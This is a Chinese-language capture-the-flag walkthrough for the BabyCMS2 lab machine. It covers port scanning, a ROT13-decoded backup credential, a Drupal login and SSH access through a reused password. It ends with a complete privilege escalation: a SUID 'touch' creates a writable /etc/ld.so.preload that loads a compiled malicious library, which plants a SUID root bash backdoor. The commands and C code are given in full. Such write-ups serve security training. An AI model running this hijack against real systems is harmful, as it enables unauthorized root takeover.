babycms2BabyCMS2
nmap -p- 192.168.5.43
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-27 05:50 EST
Nmap scan report for 192.168.5.43 (192.168.5.43)
Host is up (0.00043s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:5D:0A:A3 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
先看80端口,发现<!-- babycms2.dsz -->大概率是域名。先对目录扫描一波
发现backup.txt,解一下basenqzva:36dTUqIRDAqX38ZnFFYx看着很怪不太像账密,随波逐流一下ROT13得到admin:36qGHdVEQNdK38MaSSLk,应该是账密了。然后没有东西了。
然后添加host,看一下域名。wappalyzer看到是drupal 11。http://babycms2.dsz/drupal/user/login
拿刚才的那组账密成功登录。搜了搜drupal 11的漏洞,好像没什么。在people中发现另一个用户henry。尝试用henry:36qGHdVEQNdK38MaSSLkssh登录一波。
henry@BabyCMS2:~$ cat user.txt
flag{user-c2088f0b8df91f708406ad4acf3d3b92}
拿到user。开始提权。
henry@BabyCMS2:~$ sudo -lWe trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:#1) Respect the privacy of others.#2) Think before you type.#3) With great power comes great responsibility.[sudo] password for henry:
Sorry, user henry may not run sudo on BabyCMS2.
没有东西,看一下suid文件,find / -perm -4000 2>/dev/null注意到touch命令。看了看touch的参数,看了看定时任务,看了看本地的3306端口,跑了以下pypy64,都没找到什么有用的东西。
然后搜到了touch 命令 suid 也能提权?教你一招基于库文件劫持的提权攻击!_动态库劫持提权-CSDN博客sublarge佬写的思路,直接照着文章打的,成功提权拿到root权限。通过touch配合umask命令创建/etc/ld.so.preload来劫持了SUID 程序的启动流程
henry@BabyCMS2:~$ cd /tmp
henry@BabyCMS2:/tmp$ cat <<EOF > pe.c
> #include <stdio.h>
> #include <stdlib.h>
> #include <unistd.h>
> #include <sys/types.h>
>
> // _init 函数会在库加载时自动执行
> void _init() {
> // 【关键】如果是普通用户加载这个库,直接退出,防止死循环
> if (geteuid() != 0) return;
>
> // 下面只有 Root 进程才会执行
> // 1. 删除 preload 文件,立刻止血,防止后续干扰
> unlink("/etc/ld.so.preload");
>
> // 2. 提升权限
> setuid(0);
> setgid(0);
>
> // 3. 创建 SUID 后门 Shell
> system("cp /bin/bash /tmp/rootsh; chmod +s /tmp/rootsh");
> }
> EOF
henry@BabyCMS2:/tmp$ gcc -fPIC -shared -o /tmp/pe.so pe.c -nostartfiles
henry@BabyCMS2:/tmp$ umask 000
henry@BabyCMS2:/tmp$ /usr/bin/touch /etc/ld.so.preload
henry@BabyCMS2:/tmp$ ls -l /etc/ld.so.preload
-rw-rw-rw- 1 root root 0 Dec 26 20:27 /etc/ld.so.preload
henry@BabyCMS2:/tmp$ echo "/tmp/pe.so" > /etc/ld.so.preload
henry@BabyCMS2:/tmp$ sudo --help #运行suid程序来加载恶意库
henry@BabyCMS2:/tmp$ ls -l /tmp/rootsh
-rwsr-sr-x 1 root root 1168776 Dec 26 20:28 /tmp/rootsh
henry@BabyCMS2:/tmp$ /tmp/rootsh -p
rootsh-5.0# id
uid=1000(henry) gid=1000(henry) euid=0(root) egid=0(root) groups=0(root),1000(henry)
rootsh-5.0# cat /root/root.txt
flag{root-19c1d0bdafbf97b0f104818f5911dc64}